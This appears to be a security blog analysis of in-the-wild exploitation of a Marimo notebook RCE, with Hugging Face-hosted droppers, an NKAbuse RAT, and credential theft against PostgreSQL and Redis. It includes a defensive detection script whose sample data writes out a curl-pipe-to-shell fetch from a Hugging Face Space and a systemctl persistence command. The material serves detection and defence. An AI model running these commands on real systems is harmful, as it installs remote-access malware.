Marimo RCE Under Active Exploitation — Hugging Face Abuse and NKAbuse RAT in the Wild

The Setup: A Reactive Notebook with an RCE Problem

CVE-2026-39987 is a critical pre-auth remote code execution flaw in Marimo, an open-source reactive Python notebook library. Marimo notebooks run as web applications — which means the RCE is exposed on whatever port the server binds to, often unauthenticated in default configurations. Security researchers at Sysdig observed exploitation beginning less than 10 hours after public disclosure. That is an unusually fast turnaround from PoC to weaponized in-the-wild activity, suggesting either an existing automation pipeline or an actor who had pre-positioned tooling.

The Novel Part: Hugging Face as Malware Infrastructure

What makes this campaign notable is not the initial intrusion vector — it is what happens after. Rather than pulling a binary from a freshly registered domain or a known-bad IP, the attacker hosts the dropper script and payload on a public Hugging Face Space called vsccode-modetx (a deliberate typosquat of VS Code). The infected system runs a curl command fetching install-linux.sh from this legitimate, reputation-clean HTTPS endpoint. Because Hugging Face is an entirely above-board platform with millions of legitimate AI projects, this payload delivery is unlikely to be flagged by perimeter controls that rely on domain or URL allowlists.

The script installs a binary named kagent — typosquatting a Kubernetes AI agent — and achieves persistence via systemd on Linux, cron, or a LaunchAgent on macOS.

The Payload: NKAbuse Goes RAT

Sysdig's analysis identifies the ultimate payload as a variant of NKAbuse, a DDoS malware first documented by Kaspersky in late 2023. The original NKAbuse's novelty was its abuse of the NKN (New Kind of Network) decentralized peer-to-peer protocol for command-and-control communications, making C2 traffic look like ordinary peer-to-peer network activity rather than a synthetic C2 channel.

This updated variant functions as a remote access trojan: it accepts shell commands and returns output to the operator. Sysdig notes the binary references NKN Client Protocol, WebRTC/ICE/STUN for NAT traversal, proxy management, and structured command handling — all consistent with the original NKAbuse architecture but repurposed for interactive access rather than DDoS.

The Extended Tactics: 15 Reverse Shells and Lateral Movement

Sysdig documented additional campaigns against the same CVE within the same window. One Germany-based actor attempted 15 different reverse-shell techniques across multiple ports in a single engagement — a clear sign of an operator probing which egress paths are monitored. After establishing a foothold, they pivoted to lateral movement by extracting database credentials from environment variables and connecting to PostgreSQL to enumerate schemas, tables, and configuration data. A separate actor from Hong Kong used stolen .env credentials to target Redis, systematically dumping all 16 databases including session tokens and application cache entries.

What Defenders Do

Upgrade Marimo to version 0.23.0 or later. If immediate patching is not feasible, block external access to the /terminal/ws endpoint at the network boundary — that is the websocket endpoint enabling the RCE. Treat environment variables in containerized or notebook-run workloads as credentials at risk: if a Marimo notebook is compromised, all env vars are exposed to the attacker, including database connection strings and API keys. Apply least-privilege network segmentation so that a compromised notebook cannot reach internal databases or Redis instances.

For the Hugging Face abuse specifically: organizations that allow outbound HTTPS to huggingface.co from workload or notebook infrastructure should consider whether Spaces deserves the same trust as the primary model hub. The platform's Git-backed Spaces deployment model makes it a legitimate, trivially accessible malware host. URL-based allowlists will not catch this; behavioral detection on the curl->systemctl or curl->cron pattern from a Marimo process is a more effective signal.
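The behavioral signal described above, as an added example that is not part of Sysdig's or Marimo's code: a small triage routine over a constructed JSON-lines process-event feed (fields ts, pid, ppid, comm, cmdline are an assumed schema) that walks process ancestry, flags curl/wget spawned under a marimo process, rates Hugging Face Spaces fetches higher, and escalates when systemctl/crontab/launchctl follows a download under the same marimo root. The Space owner in the sample URL is a placeholder.

```python
import json
from urllib.parse import urlparse

DOWNLOADERS, PERSISTENCE = {"curl", "wget"}, {"systemctl", "crontab", "launchctl"}
# Constructed JSON-lines process events: a marimo server spawns a shell that fetches
# install-linux.sh from a Hugging Face Space and then enables a kagent service.
SAMPLE_EVENTS = """\
{"ts": 1, "pid": 100, "ppid": 1, "comm": "python3", "cmdline": "python3 -m marimo edit --host 0.0.0.0"}
{"ts": 2, "pid": 200, "ppid": 100, "comm": "sh", "cmdline": "sh -c 'curl -s https://huggingface.co/spaces/OWNER_PLACEHOLDER/vsccode-modetx/install-linux.sh | sh'"}
{"ts": 3, "pid": 201, "ppid": 200, "comm": "curl", "cmdline": "curl -s https://huggingface.co/spaces/OWNER_PLACEHOLDER/vsccode-modetx/install-linux.sh"}
{"ts": 4, "pid": 202, "ppid": 200, "comm": "systemctl", "cmdline": "systemctl --user enable --now kagent.service"}
{"ts": 5, "pid": 300, "ppid": 1, "comm": "curl", "cmdline": "curl -s https://example.invalid/health"}
"""

def marimo_ancestor(ev, by_pid):
    # Walk ppid links; return the nearest ancestor whose cmdline mentions marimo, else None.
    seen, cur = set(), by_pid.get(ev["ppid"])
    while cur and cur["pid"] not in seen:
        seen.add(cur["pid"])
        if "marimo" in cur["cmdline"]:
            return cur
        cur = by_pid.get(cur["ppid"])
    return None

def fetched_url(cmdline):
    # First http(s) token on the command line, parsed; None if the tool was not given a URL.
    return next((urlparse(t) for t in cmdline.split() if t.startswith(("http://", "https://"))), None)

def find_alerts(text, window=60):
    events = sorted((json.loads(ln) for ln in text.splitlines() if ln.strip()), key=lambda e: e["ts"])
    by_pid = {e["pid"]: e for e in events}
    last_download, alerts = {}, []  # marimo root pid -> ts of the most recent download under it
    for ev in events:
        root = marimo_ancestor(ev, by_pid)
        if root is None:
            continue  # not descended from a marimo process: out of scope for this rule
        if ev["comm"] in DOWNLOADERS:
            url = fetched_url(ev["cmdline"])
            host = url.hostname if url else None
            # Hugging Face Spaces is the delivery channel seen in this campaign; rate it higher.
            sev = "high" if host == "huggingface.co" and url.path.startswith("/spaces/") else "medium"
            alerts.append({"rule": "marimo_spawned_download", "pid": ev["pid"], "host": host, "severity": sev})
            last_download[root["pid"]] = ev["ts"]
        elif ev["comm"] in PERSISTENCE:
            # Persistence shortly after a download under the same marimo root is the curl->systemctl chain.
            recent = root["pid"] in last_download and ev["ts"] - last_download[root["pid"]] <= window
            alerts.append({"rule": "marimo_persistence_after_download" if recent else "marimo_spawned_persistence",
                           "pid": ev["pid"], "severity": "critical" if recent else "high"})
    return alerts
```

The unrelated curl on pid 300 produces no alert because it has no marimo ancestor, which keeps the rule from firing on ordinary health checks elsewhere on the host.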

What It Signals

The combination of fast exploitation, trusted-platform abuse, and rapid pivot to lateral movement suggests a mature actor using automated tooling against a high-value, relatively low-footprint target population. Marimo notebooks are common in data science and ML engineering environments — the same teams often have elevated access to training data, model artifacts, and cloud credentials. Compromising a notebook server can be a faster path to those assets than targeting a corporate VPN directly.

The typosquatting of both vsccode and kagent signals an actor familiar with the Kubernetes/ML tooling ecosystem and targeting environments that use those tools. This is not opportunistic spray-and-pray — it is a targeted campaign against a specific dev tool segment.

References

Sysdig analysis: https://www.sysdig.com/blog/cve-2026-39987-update-how-attackers-weaponized-marimo-to-deploy-a-blockchain-botnet-via-huggingface

BleepingComputer original report: https://www.bleepingcomputer.com/news/security/hackers-exploit-marimo-flaw-to-deploy-nkabuse-malware-from-hugging-face/

Kaspersky NKAbuse (2023): https://www.bleepingcomputer.com/news/security/new-nkabuse-malware-abuses-nkn-blockchain-for-stealthy-comms/